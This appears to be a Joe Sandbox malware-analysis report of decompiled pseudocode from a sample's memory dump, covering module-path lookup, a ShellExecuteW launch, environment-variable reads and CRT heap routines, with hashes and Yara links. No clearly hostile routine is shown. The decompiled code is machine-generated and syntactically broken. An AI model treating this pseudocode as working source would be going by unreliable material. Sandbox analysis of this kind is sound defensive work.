API ID: EncodeFeaturePointerPresentProcessor
String ID:
API String ID: 4030241255-0
Opcode ID: ced6795e210add678493164f465a92c9c3d8d7fd0e8ff81b1515743e7d878ebf
Instruction ID: 4dd3261972f7d5ea20549161c8d3530feb519b97d6b744e9f69ce7cf9df1cc2f
Opcode Fuzzy Hash: ced6795e210add678493164f465a92c9c3d8d7fd0e8ff81b1515743e7d878ebf
Instruction Fuzzy Hash: D2F0E970188305EBFB34ABACFC0AB117B9C9B54B0CF558018FA08652C5DBA09455DB10

Uniqueness

Uniqueness Score: -1.00%

Function 013124A0, Relevance: 1.7, APIs: 1, Instructions: 162
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E013124A0(void* __ebx, void* __edx, void* __edi, void* __esi, signed int _a4) {
				void* _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				long _v28;
				void _v44;
				intOrPtr _v48;
				void* _v52;
				short _v68;
				signed int _v72;
				signed int _v76;
				char _v96;
				intOrPtr _v100;
				void* _v104;
				char _v120;
				short* _v124;
				void* __ebp;
				signed int _t69;
				signed int _t70;
				void* _t73;
				void* _t75;
				signed int _t81;
				void* _t88;
				short* _t93;
				signed int _t105;
				signed int _t115;
				void* _t122;
				void* _t125;
				void* _t126;
				void* _t130;
				void* _t131;
				long _t132;
				signed int _t135;
				void* _t136;
				signed int _t137;
				void* _t140;
				void* _t143;

				_t101 = __ebx;
				_push(0xffffffff);
				_push(0x1367c0d);
				_push( *[fs:0x0]);
				_t69 =  *0x13a4018; // 0x39cca9f6
				_t70 = _t69 ^ _t137;
				_v20 = _t70;
				_push(__esi);
				_push(__edi);
				_push(_t70);
				 *[fs:0x0] =  &_v16;
				_t135 = _a4;
				_v72 = _t135;
				_v28 = 0;
				_v24 = 7;
				_v44 = 0;
				_t73 = E012F57D0(__ebx, __edx, __edi, 0x210); // executed
				_t122 = _t73;
				_v28 = 0x104;
				_v24 = 0x107;
				_t130 = _t122;
				_v72 = _t122;
				_t75 = memset(_t130, 0, 0x82 << 2);
				_t131 = _t130 + 0x82;
				 *(_t122 + 0x208) = _t75;
				E012F5760( &_v44,  &_v72);
				_t143 = _t140 - 0x68 + 0x18;
				_v8 = 0;
				_t80 =  >=  ? _v44 :  &_v44;
				_t81 = GetModuleFileNameW(0,  >=  ? _v44 :  &_v44, _v28);
				if(_t81 == 0) {
					_v28 = 0;
					_t83 =  >=  ? _v44 :  &_v44;
					 *( >=  ? _v44 :  &_v44) = 0;
				} else {
					_t117 = _v28;
					if(_t81 > _v28) {
						E012F6190(__ebx,  &_v44, _t131, _t81 - _t117, 0);
					} else {
						_v28 = _t81;
						_t120 =  >=  ? _v44 :  &_v44;
						( >=  ? _v44 :  &_v44)[_t81] = 0;
					}
				}
				asm("movups xmm0, [ebp-0x28]");
				asm("movups [ebp-0x5c], xmm0");
				asm("movq xmm0, [ebp-0x18]");
				asm("movq [ebp-0x4c], xmm0");
				_v8 = 1;
				_v52 = 0;
				_v48 = 7;
				_v68 = 0;
				_v8 = 2;
				_t132 = _v28;
				if(_t132 == 0) {
					L10:
					asm("movq xmm1, [ebp-0x30]");
					asm("movups xmm0, [ebp-0x40]");
					goto L11;
				} else {
					_push(_v72);
					_t112 =  >=  ? _v44 :  &_v96;
					_t88 = E012F86C0(_t101,  >=  ? _v44 :  &_v96, _t132, _t132,  >=  ? _v44 :  &_v96, "\\", 1);
					_t143 = _t143 + 0x10;
					if(_t88 == 0xffffffff) {
						goto L10;
					} else {
						_v72 = _t88 + 1;
						_push(_v72);
						_t114 =  >=  ? _v44 :  &_v96;
						_t125 = E012F86C0(_t101,  >=  ? _v44 :  &_v96, _t132, _t132,  >=  ? _v44 :  &_v96, ".", 1);
						_t143 = _t143 + 0x10;
						if(_t125 == 0xffffffff) {
							goto L10;
						} else {
							_t115 = _v72;
							_v104 = 0;
							_v100 = 7;
							_v120 = 0;
							if(_t132 < _t115) {
								E012F8000(_t101, _t115, _t125, _t132);
								asm("int3");
								asm("int3");
								asm("int3");
								_push(_t137);
								_t93 = _v124;
								if(_t93[8] != 0) {
									if(_t93[0xa] >= 8) {
										_t93 =  *_t93;
									}
									return ShellExecuteW(0, 0, _t93, 0, 0, 5);
								}
								return _t93;
							} else {
								_t126 = _t125 - _t115;
								_t132 = _t132 - _t115;
								_t127 =  <  ? _t132 : _t126;
								_push( <  ? _t132 : _t126);
								_t96 =  >=  ? _v44 :  &_v96;
								E012F51B0(_t101,  &_v120, _t132, _t135, ( >=  ? _v44 :  &_v96) + _t115 * 2);
								asm("movups xmm0, [ebp-0x74]");
								asm("movq xmm1, [ebp-0x64]");
								L11:
								_t105 = _v76;
								 *(_t135 + 0x10) = 0;
								 *(_t135 + 0x14) = 0;
								asm("movups [esi], xmm0");
								asm("movq [esi+0x10], xmm1");
								if(_t105 >= 8) {
									_push(2 + _t105 * 2);
									E012F56A0(_t101, _t132, _v96);
								}
								 *[fs:0x0] = _v16;
								_pop(_t136);
								return E0132EA79(_v20 ^ _t137, _t136);
							}
						}
					}
				}
			}

0x013124a0
0x013124a3
0x013124a5
0x013124b0
0x013124b4
0x013124b9
0x013124bb
0x013124be
0x013124bf
0x013124c0
0x013124c4
0x013124ca
0x013124cf
0x013124d7
0x013124de
0x013124e5
0x013124e9
0x013124ee
0x013124f0
0x013124f9
0x01312500
0x01312502
0x0131250a
0x0131250a
0x0131250c
0x0131251b
0x01312520
0x01312523
0x01312534
0x0131253b
0x01312543
0x01312578
0x0131257f
0x01312585
0x01312545
0x01312545
0x0131254a
0x0131256a
0x0131254c
0x01312553
0x01312556
0x0131255c
0x0131255c
0x0131254a
0x01312588
0x0131258c
0x01312590
0x01312595
0x0131259a
0x013125a3
0x013125aa
0x013125b1
0x013125b5
0x013125b9
0x013125be
0x0131265f
0x0131265f
0x01312664
0x00000000
0x013125c4
0x013125c4
0x013125d0
0x013125dc
0x013125e1
0x013125e7
0x00000000
0x013125e9
0x013125f3
0x013125f6
0x013125f9
0x0131260a
0x0131260c
0x01312612
0x00000000
0x01312614
0x01312614
0x01312619
0x01312620
0x01312627
0x0131262d
0x013126b8
0x013126bd
0x013126be
0x013126bf
0x013126c0
0x013126c3
0x013126ca
0x013126d0
0x013126d2
0x013126d2
0x00000000
0x013126df
0x013126e6
0x01312633
0x01312633
0x01312638
0x0131263c
0x01312643
0x01312644
0x0131264f
0x01312654
0x01312658
0x01312668
0x01312668
0x0131266b
0x01312672
0x01312679
0x0131267c
0x01312684
0x0131268d
0x01312691
0x01312696
0x0131269e
0x013126a7
0x013126b5
0x013126b5
0x0131262d
0x01312612
0x013125e7

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000104,39CCA9F6,?,?), ref: 0131253B

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: FileModuleName
String ID:
API String ID: 514040917-0
Opcode ID: 917a830ae86a188e152a04fafdc27206176de390547b0f59545a16cb8be4ab7f
Instruction ID: 534ee5695a262e6cb9667096bb1cbb0a6edf27b8aa7c87861d3e2a95c047c6d9
Opcode Fuzzy Hash: 917a830ae86a188e152a04fafdc27206176de390547b0f59545a16cb8be4ab7f
Instruction Fuzzy Hash: EA618A70E10209DEDB14CFA8C844BEEFBB5FF58328F644629D515B7290EB70A685CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012F54C0, Relevance: 1.6, APIs: 1, Instructions: 139
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E012F54C0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4, short* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				void* __ebp;
				void* _t69;
				intOrPtr _t72;
				short* _t75;
				intOrPtr _t93;
				intOrPtr _t94;
				unsigned int _t103;
				signed int _t105;
				intOrPtr _t108;
				intOrPtr* _t130;
				void* _t135;
				signed int _t136;
				void* _t141;
				void* _t142;

				_push(__ebx);
				_push(__edi);
				_t130 = __ecx;
				_t93 =  *__ecx;
				_t98 =  *((intOrPtr*)(__ecx + 4)) - _t93;
				_v8 = (0x2aaaaaab * (_a4 - _t93) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_a4 - _t93) >> 0x20 >> 2);
				_t120 = 0x2aaaaaab * ( *((intOrPtr*)(__ecx + 4)) - _t93) >> 0x20 >> 2;
				_t135 = (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 4)) - _t93) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 4)) - _t93) >> 0x20 >> 2);
				if(_t135 == 0xaaaaaaa) {
					L10:
					E012F56E0(_t93, _t98, _t120, _t130, __eflags);
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					asm("int3");
					return _v20;
				} else {
					_t136 = _t135 + 1;
					_v12 = _t136;
					_t103 = (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 8)) - _t93) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(__ecx + 8)) - _t93) >> 0x20 >> 2);
					_t120 = _t103 >> 1;
					if(_t103 <= 0xaaaaaaa - _t120) {
						_t69 = _t120 + _t103;
						__eflags = _t69 - _t136;
						_t98 =  >=  ? _t69 : _t136;
						__eflags = _t98 - 0xaaaaaaa;
						if(_t98 <= 0xaaaaaaa) {
							goto L3;
						} else {
							E012F4A60();
							goto L10;
						}
					} else {
						_t98 = 0xaaaaaaa;
						L3:
						_v16 = _t98 + _t98 * 2 << 3;
						_t72 = E012F57D0(_t93, _t120, _t130, _t98 + _t98 * 2 << 3); // executed
						_t94 = _t72;
						_t142 = _t141 + 4;
						_t105 = _t94 + (_v8 + _v8 * 2) * 8;
						_t75 = _a8;
						 *((intOrPtr*)(_t105 + 0x10)) = 0;
						 *((intOrPtr*)(_t105 + 0x14)) = 0;
						_v8 = _t105;
						asm("movups xmm0, [eax]");
						asm("movups [ecx], xmm0");
						asm("movq xmm0, [eax+0x10]");
						asm("movq [ecx+0x10], xmm0");
						 *((intOrPtr*)(_t75 + 0x10)) = 0;
						 *((intOrPtr*)(_t75 + 0x14)) = 7;
						 *_t75 = 0;
						_t107 =  *_t130;
						_t124 =  *((intOrPtr*)(_t130 + 4));
						_t76 = _a4;
						_push( *_t130);
						_push(_t94);
						if(_a4 !=  *((intOrPtr*)(_t130 + 4))) {
							E012F5770(_t107, _t76, _t130);
							_t142 = _t142 + 4;
							_t124 =  *((intOrPtr*)(_t130 + 4));
							_t107 = _a4;
							_push(_v8 + 0x18);
						}
						E012F5770(_t107, _t124, _t130);
						_t108 =  *_t130;
						if(_t108 != 0) {
							_push(_t108);
							E012F5650(_t108,  *((intOrPtr*)(_t130 + 4)));
							_push((0x2aaaaaab * ( *((intOrPtr*)(_t130 + 8)) -  *_t130) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t130 + 8)) -  *_t130) >> 0x20 >> 2) + ((0x2aaaaaab * ( *((intOrPtr*)(_t130 + 8)) -  *_t130) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t130 + 8)) -  *_t130) >> 0x20 >> 2)) * 2 << 3);
							E012F56A0(_t94, _t130,  *_t130);
							_t136 = _v12;
						}
						 *_t130 = _t94;
						 *((intOrPtr*)(_t130 + 4)) = _t94 + (_t136 + _t136 * 2) * 8;
						 *((intOrPtr*)(_t130 + 8)) = _v16 + _t94;
						return _v8;
					}
				}
			}

0x012f54ce
0x012f54d0
0x012f54d1
0x012f54d3
0x012f54dc
0x012f54e8
0x012f54f2
0x012f54fa
0x012f5502
0x012f562f
0x012f562f
0x012f5634
0x012f5635
0x012f5636
0x012f5637
0x012f5638
0x012f5639
0x012f563a
0x012f563b
0x012f563c
0x012f563d
0x012f563e
0x012f563f
0x012f5647
0x012f5508
0x012f5512
0x012f551a
0x012f5525
0x012f5529
0x012f552f
0x012f5614
0x012f5619
0x012f561b
0x012f561e
0x012f5624
0x00000000
0x012f562a
0x012f562a
0x00000000
0x012f562a
0x012f5535
0x012f5535
0x012f553a
0x012f5541
0x012f5544
0x012f5549
0x012f554b
0x012f5554
0x012f5557
0x012f555a
0x012f5561
0x012f5568
0x012f556b
0x012f556e
0x012f5571
0x012f5576
0x012f557d
0x012f5584
0x012f558b
0x012f558e
0x012f5590
0x012f5593
0x012f5596
0x012f5597
0x012f559a
0x012f559e
0x012f55a6
0x012f55a9
0x012f55af
0x012f55b2
0x012f55b2
0x012f55b3
0x012f55b8
0x012f55bf
0x012f55c4
0x012f55c5
0x012f55e8
0x012f55ea
0x012f55ef
0x012f55f2
0x012f55fe
0x012f5600
0x012f5608
0x012f5611
0x012f5611
0x012f552f

APIs

Concurrency::cancel_current_task.LIBCPMT ref: 012F562A

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Concurrency::cancel_current_task
String ID:
API String ID: 118556049-0
Opcode ID: 6324b14b590018fe41ef069ea99116c42a73c0045325675c05118ff57e969a58
Instruction ID: 486cbd0afda6fe196270644322d428e10e6fd56947807a31258ac520a432f7a2
Opcode Fuzzy Hash: 6324b14b590018fe41ef069ea99116c42a73c0045325675c05118ff57e969a58
Instruction Fuzzy Hash: 614190B1A005069FCB0CDF6CD9949A9F7E5FF98304B54826CDA1A9B351DB31EA15CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 0130A920, Relevance: 1.6, APIs: 1, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E0130A920(void* __ebx, void* __ecx, WCHAR* __edx, void* __edi) {
				int _v8;
				char _v16;
				signed int _v20;
				intOrPtr _v24;
				int _v28;
				char _v44;
				void* _v48;
				WCHAR* _v52;
				void* __esi;
				void* __ebp;
				signed int _t43;
				signed int _t44;
				void* _t50;
				void* _t52;
				WCHAR* _t56;
				WCHAR* _t72;
				signed int _t73;
				void* _t79;
				void* _t83;
				void* _t84;
				void* _t86;
				void* _t87;
				signed int _t88;

				_t63 = __ebx;
				_push(0xffffffff);
				_push(0x1366f2d);
				_push( *[fs:0x0]);
				_t43 =  *0x13a4018; // 0x39cca9f6
				_t44 = _t43 ^ _t88;
				_v20 = _t44;
				_push(__edi);
				_push(_t44);
				 *[fs:0x0] =  &_v16;
				_v52 = __edx;
				_t86 = __ecx;
				_v48 = __ecx;
				_v48 = __ecx;
				if(__edx[8] == 0) {
					 *((intOrPtr*)(__ecx + 0x10)) = 0;
					 *((intOrPtr*)(__ecx + 0x14)) = 7;
					 *__ecx = 0;
					E012F51B0(__ebx, __ecx, __edi, __ecx, 0x13836c0, 0);
				} else {
					_v28 = 0;
					_v24 = 7;
					_v44 = 0;
					_t50 = E012F57D0(__ebx, __edx, __edi, 0x210); // executed
					_t79 = _t50;
					_v28 = 0x104;
					_v24 = 0x107;
					_t83 = _t79;
					_v48 = _t79;
					_t52 = memset(_t83, 0, 0x82 << 2);
					_t84 = _t83 + 0x82;
					 *(_t79 + 0x208) = _t52;
					E012F5760( &_v44,  &_v48);
					_t56 = _v52;
					_v8 = 0;
					_t72 =  >=  ? _v44 :  &_v44;
					if(_t56[0xa] >= 8) {
						_t56 =  *_t56;
					}
					_t73 = GetEnvironmentVariableW(_t56, _t72, _v28);
					if(_t73 == 0) {
						_v28 = 0;
						_t75 =  >=  ? _v44 :  &_v44;
						 *( >=  ? _v44 :  &_v44) = 0;
					} else {
						_t59 = _v28;
						if(_t73 > _v28) {
							E012F6190(_t63,  &_v44, _t84, _t73 - _t59, 0);
						} else {
							_v28 = _t73;
							_t62 =  >=  ? _v44 :  &_v44;
							( >=  ? _v44 :  &_v44)[_t73] = 0;
						}
					}
					asm("movups xmm0, [ebp-0x28]");
					 *((intOrPtr*)(_t86 + 0x10)) = 0;
					 *((intOrPtr*)(_t86 + 0x14)) = 0;
					asm("movups [esi], xmm0");
					asm("movq xmm0, [ebp-0x18]");
					asm("movq [esi+0x10], xmm0");
				}
				 *[fs:0x0] = _v16;
				_pop(_t87);
				return E0132EA79(_v20 ^ _t88, _t87);
			}

0x0130a920
0x0130a923
0x0130a925
0x0130a930
0x0130a934
0x0130a939
0x0130a93b
0x0130a93f
0x0130a940
0x0130a944
0x0130a94a
0x0130a94d
0x0130a94f
0x0130a954
0x0130a95a
0x0130aa41
0x0130aa48
0x0130aa54
0x0130aa57
0x0130a960
0x0130a965
0x0130a968
0x0130a96f
0x0130a973
0x0130a978
0x0130a97a
0x0130a983
0x0130a98a
0x0130a98c
0x0130a994
0x0130a994
0x0130a996
0x0130a9a5
0x0130a9ad
0x0130a9b3
0x0130a9be
0x0130a9c6
0x0130a9c8
0x0130a9c8
0x0130a9d5
0x0130a9d9
0x0130aa0e
0x0130aa15
0x0130aa1b
0x0130a9db
0x0130a9db
0x0130a9e0
0x0130aa00
0x0130a9e2
0x0130a9e9
0x0130a9ec
0x0130a9f2
0x0130a9f2
0x0130a9e0
0x0130aa1e
0x0130aa22
0x0130aa29
0x0130aa30
0x0130aa33
0x0130aa38
0x0130aa38
0x0130aa61
0x0130aa6a
0x0130aa78

APIs

GetEnvironmentVariableW.KERNEL32(39CCA9F6,?,00000104,39CCA9F6), ref: 0130A9CF

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: EnvironmentVariable
String ID:
API String ID: 1431749950-0
Opcode ID: 0409db1fc36aa02fd365360f95cd9f63303c82c463e0ee6793f5ffbe0de27fe9
Instruction ID: 4c11ef9152af76601200375d93a9a7e520b3f46c4dd260d356d4f3007c60c434
Opcode Fuzzy Hash: 0409db1fc36aa02fd365360f95cd9f63303c82c463e0ee6793f5ffbe0de27fe9
Instruction Fuzzy Hash: 01411470E10709DADB14CFA8D854BAEBBF4FF08318F10462ED506A7690E770A684CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 013534FC, Relevance: 1.6, APIs: 1, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 013535AF

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 1904fd9e74227cd33d41ca40ebd575f19b8f46745a4cfa9f5ea156ea85b3f4f1
Instruction ID: e469afce68a5dcc6e122c40abed9562e51523c31e55d13a7abf04e546019ce68
Opcode Fuzzy Hash: 1904fd9e74227cd33d41ca40ebd575f19b8f46745a4cfa9f5ea156ea85b3f4f1
Instruction Fuzzy Hash: F9318D72A00614DFCB14CF5DC48085EF7F2BF897287168565E915EB360C330A905DB91

Uniqueness

Uniqueness Score: -1.00%

Function 01353AA9, Relevance: 1.5, APIs: 1, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 81%

			E01353AA9(void* __ebx, intOrPtr* __ecx, void* __eflags) {
				void* _v5;
				char _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				void* __edi;
				void* __ebp;
				void* _t17;
				char _t23;
				void* _t27;
				intOrPtr* _t32;
				intOrPtr _t33;

				_t32 = __ecx;
				_t33 = E01355C32(1, 0xb8);
				 *((intOrPtr*)( *_t32)) = _t33;
				_t17 = E01355C8F(0);
				_t37 = _t33;
				if(_t33 != 0) {
					_v36 =  *_t32;
					_v32 =  *((intOrPtr*)(_t32 + 4));
					_v28 =  *((intOrPtr*)(_t32 + 8));
					_v24 =  *((intOrPtr*)(_t32 + 0xc));
					_v20 =  *((intOrPtr*)(_t32 + 0x10));
					_t23 = 4;
					_v12 = _t23;
					_v16 = _t23;
					_push( &_v12);
					_push( &_v36);
					_push( &_v16); // executed
					_t27 = E0135392F(__ebx, _t32, _t37); // executed
					return _t27;
				}
				return _t17;
			}

0x01353aba
0x01353ac3
0x01353ac7
0x01353ac9
0x01353ad1
0x01353ad3
0x01353ada
0x01353ae0
0x01353ae6
0x01353aec
0x01353af4
0x01353af7
0x01353af8
0x01353afb
0x01353b01
0x01353b05
0x01353b09
0x01353b0a
0x00000000
0x01353b0a
0x01353b12

APIs

Part of subcall function 01355C32: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01355B82,00000001,00000364,00000006,000000FF,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355C73

_free.LIBCMT ref: 01353AC9

Part of subcall function 01355C8F: HeapFree.KERNEL32(00000000,00000000,?,013535B4), ref: 01355CA5
Part of subcall function 01355C8F: GetLastError.KERNEL32(?,?,013535B4), ref: 01355CB7

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: Heap$AllocateErrorFreeLast_free
String ID:
API String ID: 314386986-0
Opcode ID: 83ff8b924d40bbcf9b32d81ae61965243c9c99acfa405dd0ceb8c5333ae7d4a1
Instruction ID: 5125abbf04405c732c71c65e168bf5d711b4d691102aad272ae1fb7b076d1faa
Opcode Fuzzy Hash: 83ff8b924d40bbcf9b32d81ae61965243c9c99acfa405dd0ceb8c5333ae7d4a1
Instruction Fuzzy Hash: 51010CB6D00219AFCB50DFA9C441EDEBBB8FB48714F104226E915E7240E770AA45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01355C32, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E01355C32(signed int _a4, signed int _a8) {
				void* _t8;
				signed int _t13;
				signed int _t18;
				long _t19;

				_t18 = _a4;
				if(_t18 == 0) {
					L2:
					_t19 = _t18 * _a8;
					if(_t19 == 0) {
						_t19 = _t19 + 1;
					}
					while(1) {
						_t8 = RtlAllocateHeap( *0x13ab7d8, 8, _t19); // executed
						if(_t8 != 0) {
							break;
						}
						__eflags = E01355057();
						if(__eflags == 0) {
							L8:
							 *((intOrPtr*)(E0134B45F(__eflags))) = 0xc;
							__eflags = 0;
							return 0;
						}
						__eflags = E0135287B(__eflags, _t19);
						if(__eflags == 0) {
							goto L8;
						}
					}
					return _t8;
				}
				_t13 = 0xffffffe0;
				if(_t13 / _t18 < _a8) {
					goto L8;
				}
				goto L2;
			}

0x01355c38
0x01355c3d
0x01355c4b
0x01355c4b
0x01355c51
0x01355c53
0x01355c53
0x01355c6a
0x01355c73
0x01355c7b
0x00000000
0x00000000
0x01355c5b
0x01355c5d
0x01355c7f
0x01355c84
0x01355c8a
0x00000000
0x01355c8a
0x01355c66
0x01355c68
0x00000000
0x00000000
0x01355c68
0x00000000
0x01355c6a
0x01355c43
0x01355c49
0x00000000
0x00000000
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,01355B82,00000001,00000364,00000006,000000FF,?,?,0134B464,01355CB5,?,?,013535B4), ref: 01355C73

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 08bd102952be645310d04b96923c6d642d2b44c29788daa466ea4921b5049d0d
Instruction ID: 54b2c7928288109a98ad6e17a2889f74d922fac2e54f0e452086d7daf2aff0c4
Opcode Fuzzy Hash: 08bd102952be645310d04b96923c6d642d2b44c29788daa466ea4921b5049d0d
Instruction Fuzzy Hash: 92F0E931611535A7EFB16E6D8C44F5B7F4D9F50FB8F188311ED09AB584CA60F40146E0

Uniqueness

Uniqueness Score: -1.00%

Function 013576ED, Relevance: 1.5, APIs: 1, Instructions: 32
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E013576ED(long _a4) {
				void* _t4;
				long _t8;

				_t8 = _a4;
				if(_t8 > 0xffffffe0) {
					L7:
					 *((intOrPtr*)(E0134B45F(__eflags))) = 0xc;
					__eflags = 0;
					return 0;
				}
				if(_t8 == 0) {
					_t8 = _t8 + 1;
				}
				while(1) {
					_t4 = RtlAllocateHeap( *0x13ab7d8, 0, _t8); // executed
					if(_t4 != 0) {
						break;
					}
					__eflags = E01355057();
					if(__eflags == 0) {
						goto L7;
					}
					__eflags = E0135287B(__eflags, _t8);
					if(__eflags == 0) {
						goto L7;
					}
				}
				return _t4;
			}

0x013576f3
0x013576f9
0x0135772b
0x01357730
0x01357736
0x00000000
0x01357736
0x013576fd
0x013576ff
0x013576ff
0x01357716
0x0135771f
0x01357727
0x00000000
0x00000000
0x01357707
0x01357709
0x00000000
0x00000000
0x01357712
0x01357714
0x00000000
0x00000000
0x01357714
0x00000000

APIs

RtlAllocateHeap.NTDLL(00000000,00013385,00013385,?,0135BEE9,00000220,0135F479,00013385,?,?,?,?,00000000,00000000,?,0135F479), ref: 0135771F

Memory Dump Source

Source File: 00000002.00000002.310271306.00000000012F1000.00000020.00020000.sdmp, Offset: 012F0000, based on PE: true

Associated: 00000002.00000002.310248399.00000000012F0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310685959.0000000001374000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310722867.0000000001396000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.310747166.00000000013A4000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310762956.00000000013A8000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.310772796.00000000013AA000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.310784553.00000000013AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_12f0000_ab.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
